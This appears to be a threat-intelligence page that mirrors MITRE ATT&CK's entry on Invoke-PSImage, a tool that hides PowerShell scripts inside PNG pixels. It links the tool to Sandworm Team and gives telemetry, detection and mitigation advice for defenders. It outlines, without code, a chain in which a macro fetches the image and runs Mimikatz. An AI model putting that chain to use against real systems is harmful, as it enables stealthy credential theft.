S0231: Invoke-PSImage
Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. [1]
Analyst context for executives and security teams
Invoke-PSImage matters because it turns a script into content hidden inside a PNG image, then supports execution through a compact command line from a local file or the web. For leaders, the practical issue is not the tool itself but the control gap it exposes: trusted-looking media files, macros, and PowerShell activity can combine to bypass simple file-type assumptions and delay recognition of credential-theft or other script-driven activity.
Executive priority
Prioritize this as a validation point for layered defense against stealthy script delivery. Security leaders should ask whether the organization can prove visibility across PowerShell execution, document macro behavior, web retrieval of unusual image content, and downstream credential-access indicators. This is also useful for audit and readiness discussions because it tests whether controls inspect behavior and execution context rather than relying only on file extensions or static allow/block decisions.
Technical view
ATT&CK describes Invoke-PSImage as embedding PowerShell script bytes into PNG pixels and generating a one-liner for execution from a file or web location. The supplied relationships map it to Steganography and Embedded Payloads, both under stealth, and identify Sandworm Team as a group that uses the tool. Because the tool object has no official platform or detection text, SOC and IR validation should focus on the observable chain supported by the description: image retrieval or access, macro or script launch context, PowerShell command-line activity, and follow-on behavior consistent with the embedded script being executed.
Likely telemetry
- PowerShell process creation and command-line logging
- PowerShell script block, module, and transcription logs where enabled
- Office or macro-spawned process telemetry, especially child processes launching PowerShell
- Web proxy, DNS, and endpoint network telemetry for image downloads followed by script execution
- Endpoint file telemetry for PNG files accessed shortly before PowerShell execution
Detection direction
- Validate correlations between macro-capable applications or other user-facing processes and PowerShell execution, especially when preceded by image download or file access.
- Tune for suspicious PowerShell one-liners and web-sourced execution patterns while accounting for legitimate administrative PowerShell use.
- Do not rely on image file type alone; the relationship to Steganography and Embedded Payloads means benign-looking media may carry executable content.
- Hunt for process chains where a PNG or web image request is temporally close to PowerShell execution and subsequent credential-access behavior.
- Use the Sandworm Team relationship as threat-intelligence context for prioritization, not as proof of attribution in a local incident.
Mitigation priorities
- Reduce exposure to macro-driven execution paths where business requirements allow, and harden document handling for untrusted content.
- Constrain and monitor PowerShell use with policy, logging, and least-privilege administration practices appropriate to the environment.
- Ensure web and endpoint controls evaluate execution behavior and parent-child process context, not only file extensions or media types.
- Prioritize credential protection and credential-access monitoring because the official description cites embedding Invoke-Mimikatz as an example use case.
- Test incident response playbooks for cases where payloads are concealed in otherwise ordinary files and attribution is uncertain.
Analyst notes and limits
This take is based on the official ATT&CK tool description, the GitHub external reference, and relationships to Sandworm Team, Steganography, and Embedded Payloads. The most valuable local validation is whether defenders can connect image retrieval, macro or parent-process context, PowerShell execution, and follow-on behavior into a single investigation timeline.
ATT&CK does not provide official detection text, tactics, platforms, aliases, or labels for the Invoke-PSImage tool object. Related techniques list Linux, macOS, and Windows, but the tool itself has no specified platform in the supplied fields, so platform-specific coverage should be confirmed locally before making claims.
Invoke-PSImage
Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. [1]
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1027.003 | Steganography Sub-technique | Invoke-PSImage can be used to embed a PowerShell script within the pixels of a PNG file.CitationGitHub Invoke-PSImage |
| Enterprise | T1027.009 | Embedded Payloads Sub-technique | Invoke-PSImage can be used to embed payload data within a new image file.CitationGitHub PSImage |
Groups, software, and campaigns
G0034: Sandworm Team
Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.[1][2] This group has been active since at least 2009.[3][4][5][6]
In October 2020, the US indicted six GRU Unit 74455 officers associated with Sandworm Team for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide NotPetya attack, targeting of the 2017 French presidential campaign, the 2018 Olympic Destroyer attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.[1][2] Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as APT28.[7]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 1.1 | Current bundle | 033c95d2f66d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
GitHub Invoke-PSImage
Adams, B. (2017, December 17). Invoke-PSImage. Retrieved April 10, 2018.
Open source URL -
[2]
mitre-attack S0231Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.